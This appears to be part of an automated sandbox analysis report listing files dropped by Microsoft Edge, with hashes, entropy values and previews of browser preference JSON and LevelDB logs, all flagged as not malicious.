                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8450
                                                                                                                                                                            Entropy (8bit):5.215774013272929
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66WjLlaFIMYWPLMJ:stFSBso0xhzWvibGix6WjLlaTYB
                                                                                                                                                                            MD5:0475CBA17D181B47D5A9F08E5BD1B807
                                                                                                                                                                            SHA1:0EFC6A23C930FDCB4FA0342BA8004DF928320143
                                                                                                                                                                            SHA-256:3DD1F16B1D662AB38FE3FB0CAD1C0C8905FF9D613EA47977C9B0F5AE0FAB5712
                                                                                                                                                                            SHA-512:5EB2DB06BE627C81E04042A423D34A6733EE4F7B8B99B07AA273A038A97BFD67DCE8A11BC271821830C456F58F7303833F7F1DF4BE74B08627F6CB2367F0B2F0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8285
                                                                                                                                                                            Entropy (8bit):5.218879715917992
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66WjTaFIMYWPLMJ:stFSBso0xhzWvibGix6WjTaTYB
                                                                                                                                                                            MD5:33F54F8FAF14970E74B19FC1D299C514
                                                                                                                                                                            SHA1:238E3852CCFFC25673F29078CB0F98B16C21C54F
                                                                                                                                                                            SHA-256:63B88DC1266D18D2B9DA7E2A107A82DD563F1EEA31666CB0F9313C3C0C7ED593
                                                                                                                                                                            SHA-512:FDBB2350AC8E38D463F9A16EA7F6489A6B6F5E54305E840BEA135D4CF532F33C8AB9E14663214E4EB30C3993121CBF0F3C59B40AEBDB0F5DD488C49848C836A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):30210
                                                                                                                                                                            Entropy (8bit):5.566136929891675
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7b37pLGLPLSWPMOf1d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVtEQ2CnOrwpbpto:MhD7bxcPLSWPMOf1du1jaEEQrnLpnta
                                                                                                                                                                            MD5:0713352AAEC283701309F511FF3DCB73
                                                                                                                                                                            SHA1:6C6EDBC2BBFE00AA919632FFC73158F96492DE0E
                                                                                                                                                                            SHA-256:20D105B09D4FA0020B67D8C5B32E98DE2638F275917969E7B48BD685263D7BD5
                                                                                                                                                                            SHA-512:1181FC208F3FE89C2D49D54EC7FC6AC3AD8216EBD13A06BB4E891F4AD454AF4FFA1A7CFB52D3519896FE3B6A60EF19C8C4F940097AD52213FA1567EC39F8DE4B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):480975
                                                                                                                                                                            Entropy (8bit):5.394826940127414
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:v+477TZyhJOGiMlbOFbXG/KFd2X13p8S15tndAYDI11csxH:v+4zZoOG1eLG/KKp8cdAYDI11csh
                                                                                                                                                                            MD5:FFB1C3BC78CD3BDDE1E32A847411707E
                                                                                                                                                                            SHA1:E6F6A4C9E9EF011799EFE18F6BC9ADCDF6BF24AD
                                                                                                                                                                            SHA-256:F3244085AF939693DAA3F6D1D9AC63F29A1BF7324E89C78619913D9629A3892B
                                                                                                                                                                            SHA-512:0F6DD515E7E662B89B15397084687EEBA447F2E6670F0B27C7E34F6028758B33BC6B9AA921FF2171836F08FFDB2967C8004F062E805F7097118BAAA1111F5665
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.099279559664645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7CXF0M+q2P923oH+Tcwt9Eh1tIFUt8OCRFhZmw+OSMVkwO923oH+Tcwt9Eh15LJ:7UOM+v4Yeb9Eh16FUt8O2h/+OSMV5LYf
                                                                                                                                                                            MD5:84E976774033461B1B788EC9FB330B90
                                                                                                                                                                            SHA1:0A95E7507BE7C3F84FE98E15BC92A8A85C34CCA5
                                                                                                                                                                            SHA-256:A3D0BD7DAB30084B6E474826F4E2342F36DD741B801759BEF0DCBE1273E16F97
                                                                                                                                                                            SHA-512:19573F4693924A43E45A2D398986C9781B410F4DF4B87A1F2D55A5397143848E542E42CB9049A688686FE1CE0A368090DC6AF220C8FEF1666940ED0CEFCDC9ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:42:38.502 128c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/11-03:42:38.504 128c Recovering log #3.2024/12/11-03:42:38.512 128c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):348
                                                                                                                                                                            Entropy (8bit):5.232975016368335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7IIq2P923oH+TcwtnG2tMsIFUt8OGsZmw+OGMkwO923oH+TcwtnG2tMsLJ:7pv4Yebn9GFUt8O5/+OT5LYebn95J
                                                                                                                                                                            MD5:D84E410EC8A9C858B129EE7CFEF3D505
                                                                                                                                                                            SHA1:EFD954228165A7ECD0E5568E5AE719F3315AC086
                                                                                                                                                                            SHA-256:E8E0E52FB5F0589A39B6DACD1818697F3533B35E0565B660E4269C7E24CD24DE
                                                                                                                                                                            SHA-512:1E2BB33ACC0CD08A99290B699CF9008298771BE13E7B573EE86357719D59C786DC1C190B76EBFE1AAEA6BAA32472D83B0A43BEC63DB29063C23E90243AC49C86
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.383 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/11-03:39:38.384 1574 Recovering log #3.2024/12/11-03:39:38.384 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.220165516762738
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7yVt+q2P923oH+Tcwt8aPrqIFUt8OTZmw+O8nVkwO923oH+Tcwt8amLJ:7y+v4YebL3FUt8OT/+OA5LYebQJ
                                                                                                                                                                            MD5:7D9F9D984B9EAD8F0FD84799B4C3F3B1
                                                                                                                                                                            SHA1:D2DF66D6652539170CDB1CD8F920B54AB0AD4ABD
                                                                                                                                                                            SHA-256:A63F8059AA2178418BE2B01B5D0F4ACDD23D54ECF88BED6CD075B5573FB00593
                                                                                                                                                                            SHA-512:57C5B36F36210E23AC6DF194A16AACF96C17767AA502BCF5CDBD20518906E1406F8CFD66CD5AC69CA5D395D8330BEEAB99D71F5872630C0169E123125AC72981
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.546 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/11-03:39:38.547 4d8 Recovering log #3.2024/12/11-03:39:38.548 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                            Entropy (8bit):5.192698215665074
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7+FN+q2P923oH+Tcwt865IFUt8O/5Zmw+OQVkwO923oH+Tcwt86+ULJ:7+Ov4Yeb/WFUt8Oh/+OI5LYeb/+SJ
                                                                                                                                                                            MD5:0C781934C69EAECCAA5BBFF41F5E4918
                                                                                                                                                                            SHA1:9D20F2B61CD40E72F5D3B36DC8D6B9CF939C232D
                                                                                                                                                                            SHA-256:C09810AD945EBB7598DDF51D93984AD2A51D2906143CC418F59CBB7566328532
                                                                                                                                                                            SHA-512:4FB37F777F447C85EE92107E0955D2EB7D1CA7BA38F79E08CD827864B20D6B0CCE7C444F7CDC9541B4A52292331D86F8AD74B18B021DF68996499CF77B3172F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.731 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/11-03:39:38.732 4d8 Recovering log #3.2024/12/11-03:39:38.733 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                            MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                            SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                            SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                            SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.177097241668169
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7q5AVq2P923oH+Tcwt8NIFUt8Oq5AgZmw+OzoRNAIkwO923oH+Tcwt8+eLJ:7q5AVv4YebpFUt8Oq5Ag/+OzoLAI5LYN
                                                                                                                                                                            MD5:74951722B19F46F7587855BF995EE1C6
                                                                                                                                                                            SHA1:7737C70DF63569721AD906A74B805960B540279E
                                                                                                                                                                            SHA-256:39D4239953D00D564A0DD95EF5B56799283270715B47F4845E83891410D8339C
                                                                                                                                                                            SHA-512:24F52A5961742CEE30652C0E8F8DF77516C9E250C58F42EA700C280B108AB29DE2E064FC1118BE5F314ADE2BA95F18060FA3F6A5F1F552C09154DEC23BC86F1F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.469 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/11-03:39:39.469 12b4 Recovering log #3.2024/12/11-03:39:39.470 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):429
                                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8720
                                                                                                                                                                            Entropy (8bit):0.21767183608283716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:c/lD/ntFlljq7A/mhWJFuQ3yy7IOWUYrn4/dweytllrE9SFcTp4AGbNCV9RUIL:0Dk75fOOrn4/d0Xi99pEYZ
                                                                                                                                                                            MD5:7B44E60132EFEC3C6C928AA4B427AB09
                                                                                                                                                                            SHA1:8D427700E37624ABCD5A8D1F9C2E1CE730CC9BBB
                                                                                                                                                                            SHA-256:E222D39E8CEA5FC99428628B1588636301BF9636015693E7DC81814BFDDC20AE
                                                                                                                                                                            SHA-512:9D64795B896B0B3FDA476649EF1FD1746043FD2F1FD8A9124D7DE2099D6AF7AAEB62818E9528011EA12019173D04DDDFD3AA72860C54AF782984F19F207DA0A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):408
                                                                                                                                                                            Entropy (8bit):5.2505178400540204
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7MrAVv4Yeb8rcHEZrELFUt8OtAg/+OtAI5LYeb8rcHEZrEZSJ:7MrA54Yeb8nZrExg8OtAwtASLYeb8nZR
                                                                                                                                                                            MD5:B7A9FD6A4600AA081644A5169FCE0BF5
                                                                                                                                                                            SHA1:573A54614671D930B11355D88F667AE505435C5B
                                                                                                                                                                            SHA-256:EEAF54066B599575FE9B567CD6A270995A52C448292F05DC75F3FAB93007FC27
                                                                                                                                                                            SHA-512:EB29B6D876AB124A7B0FA84ED81114B3818963F1CAD6E23C27AEB46037AE1A2CFB8EF1A34C4656FCE99B8523FC9AA6CC256983BE25BC73F5477E044C6378A211
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:41.305 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/11-03:39:41.306 12b4 Recovering log #3.2024/12/11-03:39:41.306 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.124735820508631
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:71zLM+q2P923oH+Tcwt8a2jMGIFUt8O1HZZmw+O1nqMVkwO923oH+Tcwt8a2jMmd:7t4+v4Yeb8EFUt8OdZ/+OlV5LYeb8bJ
                                                                                                                                                                            MD5:1E07A6A05404000991E231DBE2E64BED
                                                                                                                                                                            SHA1:C0251A2C6142667DF19ADD5B9BB305622D38DCCB
                                                                                                                                                                            SHA-256:286B44AACBB5024F53058A58A2F4188FCA7064FF865E6D10003DCE89F83B9ADC
                                                                                                                                                                            SHA-512:66C1DC5139460D3C9F41F76E0F3B6FC7932E757D73B8ABF90A3A1AC03B974A231F1FA64B710CB28A157145A017E8ED61D00B49F3F57658FB7D1B031CA00F1916
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.551 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.552 10ac Recovering log #3.2024/12/11-03:39:39.554 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1419
                                                                                                                                                                            Entropy (8bit):5.3472674680284875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:YcFGJ/I3w6C1VdsOCyZVMdmRdsByZFRudFGRRdsYetZ6ma3yeesw6maPsQYhbxPf:YcgCgRsOvts4fcKsnrleeBkhYhbxo+
                                                                                                                                                                            MD5:98C3C225F0B77708EEF9CBBA81A60E4B
                                                                                                                                                                            SHA1:F80AC44C3A6823B58CB1DF504C3A342D0CBEB619
                                                                                                                                                                            SHA-256:E7CC67229AFCEFC5EED85006BF646FEAF14890EFBCED65BE3CECE3317E6DB650
                                                                                                                                                                            SHA-512:6F49079BB8287384F685A41CA9071F0A8B324CB5EB66EFAEC4C205DD8A5A6CCDF725DDA35363A1BA6D02515F3976225447E32484E223AB5F993A8A77DC52F9F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971983440446","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380971986371686","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378473609935157","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
